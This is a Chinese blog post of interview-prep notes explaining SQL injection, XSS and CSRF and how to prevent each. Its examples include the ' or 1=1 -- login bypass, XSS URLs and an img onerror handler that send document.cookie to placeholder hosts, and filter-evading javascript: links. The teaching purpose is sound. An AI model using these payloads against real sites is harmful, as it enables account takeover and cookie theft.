网络安全(数据库等)

最新推荐文章于 2024-08-02 08:42:00 发布
最新推荐文章于 2024-08-02 08:42:00 发布
阅读量504 收藏 3
点赞数
分类专栏: 面试复习 面经题库 文章标签: sql java 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_48028855/article/details/110338087
版权

SQL注入 XSS攻击 CSRF防范 数据安全 Web应用防护
关键词由CSDN通过智能技术生成

如何避免sql注入?

1、概念

SQL 注入(SQL Injection),是 Web 开发中最常见的一种安全漏洞。

可以用它来从数据库获取敏感信息、利用数据库的特性执行添加用户、导出文件等一系列恶意操作,甚至有可能获取数据库乃至系统用户最高权限。

2、造成 SQL 注入的原因

程序没有有效过滤用户的输入,使攻击者成功的向服务器提交恶意的 SQL 脚本,程序在接收后错误的将攻击者的输入作为 SQL 语句的一部分执行,导致原始的查询逻辑被改变,执行了攻击者精心构造的恶意 SQL 语句。

如 从用户表根据用户名 ConstXiong 和密码 123 查用户信息

select * from user where username = 'ConstXiong' and password = '123'

恶意修改用户名参数 ConstXiong -> ConstXiong’ or 1=1 –

select * from user where username = 'ConstXiong' or 1=1 --' and password = '123'

imgimg

SQL 中 – 是注释标记,如果上面这个 SQL 被执行,就可以让攻击者在不知道任何用户名和密码的情况下成功登录。

3、预防 SQL 注入攻击的方法

  • 严格限制 Web 应用的数据库的操作权限,给连接数据库的用户提供满足需要的最低权限,最大限度的减少注入攻击对数据库的危害
  • 校验参数的数据格式是否合法(可以使用正则或特殊字符的判断)
  • 对进入数据库的特殊字符进行转义处理,或编码转换
  • 预编译 SQL(Java 中使用 PreparedStatement),参数化查询方式,避免 SQL 拼接
  • 发布前,利用工具进行 SQL 注入检测
  • 报错信息不要包含 SQL 信息输出到 Web 页面

什么是XSS攻击,如何避免?

XSS 攻击,即跨站脚本攻击(Cross Site Scripting),它是 web 程序中常见的漏洞。

原理

攻击者往 web 页面里插入恶意的 HTML 代码(Javascript、css、html 标签等),当用户浏览该页面时,嵌入其中的 HTML 代码会被执行,从而达到恶意攻击用户的目的。如盗取用户 cookie 执行一系列操作,破坏页面结构、重定向到其他网站等。

种类

1、DOM Based XSS:基于网页 DOM 结构的攻击

例如:

  • input 标签 value 属性赋值
//jsp
<input type="text" value="<%= getParameter("content") %>">

访问

http://xxx.xxx.xxx/search?content=<script>alert('XSS');</script>    //弹出 XSS 字样
http://xxx.xxx.xxx/search?content=<script>window.open("xxx.aaa.xxx?param="+document.cookie)</script>    //把当前页面的 cookie 发送到 xxxx.aaa.xxx 网站
  • 利用 a 标签的 href 属性的赋值
//jsp
<a href="escape(<%= getParameter("newUrl") %>)">跳转...</a>

访问

http://xxx.xxx.xxx?newUrl=javascript:alert('XSS')    //点击 a 标签就会弹出 XSS 字样
变换大小写
http://xxx.xxx.xxx?newUrl=JAvaScript:alert('XSS')    //点击 a 标签就会弹出 XSS 字样
加空格
http://xxx.xxx.xxx?newUrl= JavaScript :alert('XSS')    //点击 a 标签就会弹出 XSS 字样
  • image 标签 src 属性,onload、onerror、onclick 事件中注入恶意代码
<img src='xxx.xxx' onerror='javascript:window.open("http://aaa.xxx?param="+document.cookie)' />

2、Stored XSS:存储式XSS漏洞

<form action="save.do">
	<input name="content" value="">
</form>

输入 ,提交
当别人访问到这个页面时,就会把页面的 cookie 提交到 xxx.aaa.xxx,攻击者就可以获取到 cookie

预防思路

  • web 页面中可由用户输入的地方,如果对输入的数据转义、过滤处理
  • 后台输出页面的时候,也需要对输出内容进行转义、过滤处理(因为攻击者可能通过其他方式把恶意脚本写入数据库)
  • 前端对 html 标签属性、css 属性赋值的地方进行校验

注意:

各种语言都可以找到 escapeHTML() 方法可以转义 html 字符。

<script>window.open("xxx.aaa.xxx?param="+document.cookie)</script>
转义后
%3Cscript%3Ewindow.open%28%22xxx.aaa.xxx%3Fparam%3D%22+document.cookie%29%3C/script%3E

需要考虑项目中的一些要求,比如转义会加大存储。可以考虑自定义函数,部分字符转义。

什么是CSRF攻击,如何避免?

CSRF:Cross Site Request Forgery(跨站点请求伪造)。**
CSRF 攻击者在用户已经登录目标网站之后,诱使用户访问一个攻击页面,利用目标网站对用户的信任,以用户身份在攻击页面对目标网站发起伪造用户操作的请求,达到攻击目的。

避免方法:

  • CSRF 漏洞进行检测的工具,如 CSRFTester、CSRF Request Builder…
  • 验证 HTTP Referer 字段
  • 添加并验证 token
  • 添加自定义 http 请求头
  • 敏感操作添加验证码
  • 使用 post 请求
LITTLE LAY
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
2020网络数据安全相关标准项目明细表
云上笛暮
09-03 522
序号 标准名称 标准号/计划号 所属组织 状态 基础共性 术语定义 《信息安全技术 术语》 SAC/TC260 征求意见稿 《电信数据服务平台 第2部分:术语及参考模型》 2018-23...
中间件+数据库+系统+设备+网络的网络安全基线核查
07-16
cisco防火墙PIX&ASA基线检查 cisco路由交换基线检查表 ...oracle数据库基线检查 solaris基线检查 sqlserver基线检查 suse基线检查 windows基线检查 负载均衡基线检查 中间件基线核查 Linux基线核查 MySql基线核查 等等
网络安全——数据库基础知识
weixin_54055099的博客
09-04 1284
数据库的基本知识和操作
网络安全和数据安全到底有什么区别?(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Python_paipai的博客
08-02 1016
网络安全,顾名思义,是指在网络环境中,通过采取各种技术手段和管理措施,保护网络系统的正常运行,防止网络攻击和数据泄露,确保网络服务的可用性、机密性和完整性。数据安全的保护远比网络安全复杂。内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
网络安全-MySQL数据库
su__xiaoyan的博客
12-30 4397
MySQL 数据库(Database)是按照数据结构来组织、存储和管理数据的仓库。MySQL 是最流行的关系型数据库管理系统,在 WEB 应用方面> MySQL 是最好的 RDBMS(Relational Database Management System:关系数据库管理系统)应用软件之一。 默认端口:3306 基础操作 MySQL数据库安装 操作系统:Cent OS 6.9 安装MySQL:yum install -y mysql-server 启动MySQL:service mysqld
网络安全----数据库1
SonMessi的博客
05-19 807
网络安全
WEB安全、应用安全、数据库安全——信息与网络安全的下一个方向
weixin_34396902的博客
02-28 341
最近和一些朋友聊天,包括一些厂家的朋友最近对WEB安全、应用安全、数据库安全的需求明显增加了版权声明:网路游侠 [url]http://www.youxia.org[/url]WEB安全始终应该是最明显的,但是却被传统安全厂商所遗忘:在他们吹嘘防火墙、***检测的时候“地下***”们却在流传如何绕过IDS等的议题同时由于防火墙和***检测系统联动的问题特别多所以应用的并不算好...
大数据背景下数据库网络安全的防范方法.pdf
09-19
大数据背景下,数据库网络安全性成为了信息技术领域的重要议题。随着技术的发展,传统关系型数据库面临数据量剧增的挑战,而基于云技术的云数据库应运而生,为大数据的存储、处理提供了新平台。然而,这也带来了新...
数据库中的高科技和高安全性|网络安全
02-26
针对网络安全的措施最好在系统设计时就进行考虑,否则后期的改造成本会非常高。新的技术和应用会使系统的安全和隐私面临新的挑战,而且采纳新技术的结果通常很难去预测。图数据库就是这样的情形,它是一个比较新的、...
基于神经网络系统的网络安全数据库系统开发研究.pdf
09-20
本文档标题为“基于神经网络系统的网络安全数据库系统开发研究”,主要探讨了如何利用神经网络系统来增强网络安全数据库的安全性和管理效率。文档的核心内容包括对网络安全数据库专家系统的设计、知识库与综合数据库...
等保2.0服务器、数据库、应用系统、网络安全设备加固建议.docx
02-08
根据等保2.0基本要求整理的针对服务器、数据库、应用系统、网络安全设备加固建议
网络安全&常用的主流数据库(DBMS)✍
✍千里之行,始于足下 ^,^
03-09 1764
常见的主流数据库(DBMS) 原创 ...
网络安全工程师必知的75个网络端口(非常详细)从零基础入门到精通,看完这一篇就够了_常用端口
uiuuyy67的博客
04-16 754
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。(img-vYUzaBlZ-1713270115553)]还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。
MySQL数据库中关于网络安全的解决方案
zgqtxwd的专栏
05-01 310
<!--google_ad_client = "pub-2947489232296736";/* 728x15, 创建于 08-4-23MSDN */google_ad_slot = "3624277373";google_ad_width = 728;google_ad_height = 15;//--><script type="text/javascript"
网络安全】一款内网横向利用工具(1)
2401_84263434的博客
04-28 566
优化某些代码mssql模块1:xcmdhshell 一键利用2:OLE一键利用oracle利用模块:shellrun函数执行系统命令关于oracle模块报错暂时移除oracle 使用可以从cmd/oracle.go import包中去除//再按照上文参考配置Postgersql模块1:一键写入webshell2:命令执行Smb模块解决linux打包问题攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。
网络安全需要学什么?网络安全需要掌握哪些技能?
oldboyedu1的博客
12-06 2570
  目前网络安全是一个非常受欢迎的职业,其前景好、需求量大,无论大企业还是小企业,网络安全都是一个双高职位,地位高、薪资高,而且入门门槛也比较低。那么网络安全难学吗?需要掌握哪些技能?接下来,为大家介绍一下。  网络安全难学吗?  学习网络安全需要循序渐进,由浅入深。其实网络安全本身的知识并不难,但是需要学习的内容有很多,比如包括Linux、数据库、渗透测试、等保测评、应急响应、代码审计等,想要学好并非易事。如果想要学习网络安全,一旦确定之后,我们就要不怕困难,坚定的走下去,只要努力就有回报。  这种情况下
网络安全从零开始(后端基础SQL数据库简介)
GetorPost的博客
04-15 529
什么是数据库 数据库就是将大量数据保存起来,通过计算机加工而成的可以高效的访问的数据集合, 数据库是长期存储在计算机内,有组织的,可共享的数据集合。 常见的数据库 Oracle Database 甲骨文公司 SQL Server 微软公司 DB2 IMB公司 PostgreSQL、MySQL 开源数据库 Access 微软公司【古董】 正常渗透测试会遇到Oracle Database、SQL Server
[转]网络安全人士必备的漏洞库、威胁情报源
tpriwwq的专栏
09-27 2713
漏洞是攻击面管理中的重要组成部分,常用的漏洞库做了整理。 网络安全人士必备。
"多级安全网络数据库管理体系结构研究与应用
同时,可以结合大数据、人工智能等新兴技术,进一步推动多级安全网络数据库管理体系结构在信息安全领域的发展和应用,为网络安全提供更加有效的保障。希望通过不断的研究和实践,能够为信息安全领域的发展和进步做出...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值